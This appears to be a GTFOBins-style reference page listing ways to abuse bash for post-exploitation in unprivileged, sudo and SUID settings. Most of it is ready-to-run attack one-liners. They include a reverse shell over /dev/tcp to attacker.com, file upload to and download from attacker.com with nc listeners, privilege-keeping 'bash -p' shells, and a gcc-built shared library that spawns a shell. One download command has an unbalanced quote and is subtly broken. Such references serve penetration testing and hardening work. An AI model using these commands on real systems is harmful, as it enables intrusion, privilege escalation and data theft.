.. / bash

Sponsor Fork Star

Shell

This executable can spawn an interactive system shell.

Unprivileged
This function can be performed by any unprivileged user.
```
bash
```
Sudo
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks
If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
```
bash
```
SUID
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
```
bash -p
```

Reverse shell

This executable can send back a reverse system shell to a listening attacker.

Unprivileged
This function can be performed by any unprivileged user.
```
bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'
```
Sudo
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks
If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
```
bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'
```
SUID
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
```
bash -p -c 'exec bash -p -i &>/dev/tcp/attacker.com/12345 <&1'
```
TTY
The spawned shell is just a dummy REPL that can only run simple terminal commands.
Listener
A TCP server can be used on the attacker box to receive the shell.
```
nc -l -p 12345
```

File write

This executable can write data to local files.

Unprivileged
This function can be performed by any unprivileged user.
```
bash -c 'echo DATA >/path/to/output-file'
```
Sudo
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks
If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
```
bash -c 'echo DATA >/path/to/output-file'
```
SUID
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
```
bash -p -c 'echo DATA >/path/to/output-file'
```
Comment
This only works interactively from an existing bash session. It adds timestamps to the output file.
Unprivileged
This function can be performed by any unprivileged user.
```
HISTIGNORE='history *'
history -c
DATA
history -w /path/to/output-file
```
Sudo
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks
If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
```
HISTIGNORE='history *'
history -c
DATA
history -w /path/to/output-file
```
SUID
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
```
HISTIGNORE='history *'
history -c
DATA
history -w /path/to/output-file
```
Remarks
The content is corrupted or otherwise altered by the process, thus it might not be suitable for handling arbitrary binary data.

File read

This executable can read data from local files.

Unprivileged
This function can be performed by any unprivileged user.
```
bash -c 'echo "$(</path/to/input-file)"'
```
Sudo
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks
If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
```
bash -c 'echo "$(</path/to/input-file)"'
```
SUID
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
```
bash -p -c 'echo "$(</path/to/input-file)"'
```
Remarks
The content is corrupted or otherwise altered by the process, thus it might not be suitable for handling arbitrary binary data.
Comment
This only works interactively from an existing bash session.
Unprivileged
This function can be performed by any unprivileged user.
```
HISTTIMEFORMAT=$'\r\e[K'
history -c
history -r /path/to/input-file
history
```
Sudo
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks
If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
```
HISTTIMEFORMAT=$'\r\e[K'
history -c
history -r /path/to/input-file
history
```
SUID
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
```
HISTTIMEFORMAT=$'\r\e[K'
history -c
history -r /path/to/input-file
history
```
Remarks
The content is corrupted or otherwise altered by the process, thus it might not be suitable for handling arbitrary binary data.

Upload

This executable can upload local data.

Unprivileged
This function can be performed by any unprivileged user.
```
bash -c 'echo -e "POST / HTTP/0.9\n\n$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'
```
Sudo
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks
If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
```
bash -c 'echo -e "POST / HTTP/0.9\n\n$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'
```
SUID
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
```
bash -p -c 'echo -e "POST / HTTP/0.9\n\n$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'
```
Remarks
The content is corrupted or otherwise altered by the process, thus it might not be suitable for handling arbitrary binary data.
Receiver
An HTTP server can be used on the attacker box to receive the data.
```
nc -l -p 80 | awk 'BEGIN {RS="\r\n\r\n";ORS=""} NR==2' >/path/to/output-file
```
Unprivileged
This function can be performed by any unprivileged user.
```
bash -c 'echo -n "$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'
```
Sudo
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks
If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
```
bash -c 'echo -n "$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'
```
SUID
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
```
bash -p -c 'echo -n "$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'
```
Remarks
The content is corrupted or otherwise altered by the process, thus it might not be suitable for handling arbitrary binary data.
Receiver
A TCP server can be used on the attacker box to receive the data.
```
nc -l -p 12345 >/path/to/output-file
```

Download

This executable can download remote data.

Unprivileged

This function can be performed by any unprivileged user.

bash -c '{ echo -ne "GET /path/to/input-file HTTP/1.0\r\nhost: attacker.com\r\n\r\n" 1>&3; cat 0<&3; } \
    3<>/dev/tcp/attacker.com/12345 \
    | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } >/path/to/output-file'

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

bash -c '{ echo -ne "GET /path/to/input-file HTTP/1.0\r\nhost: attacker.com\r\n\r\n" 1>&3; cat 0<&3; } \
    3<>/dev/tcp/attacker.com/12345 \
    | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } >/path/to/output-file'

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

bash -p -c '{ echo -ne "GET /path/to/input-file HTTP/1.0\r\nhost: attacker.com\r\n\r\n" 1>&3; cat 0<&3; } \
    3<>/dev/tcp/attacker.com/12345 \
    | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } >/path/to/output-file'

Remarks

The content is corrupted or otherwise altered by the process, thus it might not be suitable for handling arbitrary binary data.

Sender

An HTTP server can be used on the attacker box to send the data.

python -m http.server 80

Unprivileged
This function can be performed by any unprivileged user.
```
bash -c 'echo "$(</dev/tcp/attacker.com/12345) >/path/to/output-file'
```
Sudo
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks
If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
```
bash -c 'echo "$(</dev/tcp/attacker.com/12345) >/path/to/output-file'
```
SUID
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
```
bash -p -c 'echo "$(</dev/tcp/attacker.com/12345) >/path/to/output-file'
```
Remarks
The content is corrupted or otherwise altered by the process, thus it might not be suitable for handling arbitrary binary data.
Sender
A TCP server can be used on the attacker box to send the data.
```
nc -l -p 12345 </path/to/input-file
```

Library load

This executable can load shared libraries that may be used to run arbitrary code in the same execution context.

Unprivileged
This function can be performed by any unprivileged user.
```
bash -c 'enable -f /path/to/lib.so x'
```
Sudo
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks
If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
```
bash -c 'enable -f /path/to/lib.so x'
```
SUID
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
```
bash -p -c 'enable -f /path/to/lib.so x'
```
Payload
As an example, the following can be used to create a minimal shared library (lib.so) that spawns a shell upon loading:
```
echo '__attribute__((constructor)) init() { execl("/bin/sh", "sh", 0); }' \
    | gcc -w -fPIC -shared -o lib.so -x c -
```
Add the usual -p argument to the shell for SUID contexts. Consider calling setuid(0); beforehand if the executable has the CAP_SETUID capability assigned.

Source | History

.. / bash Sponsor Fork Star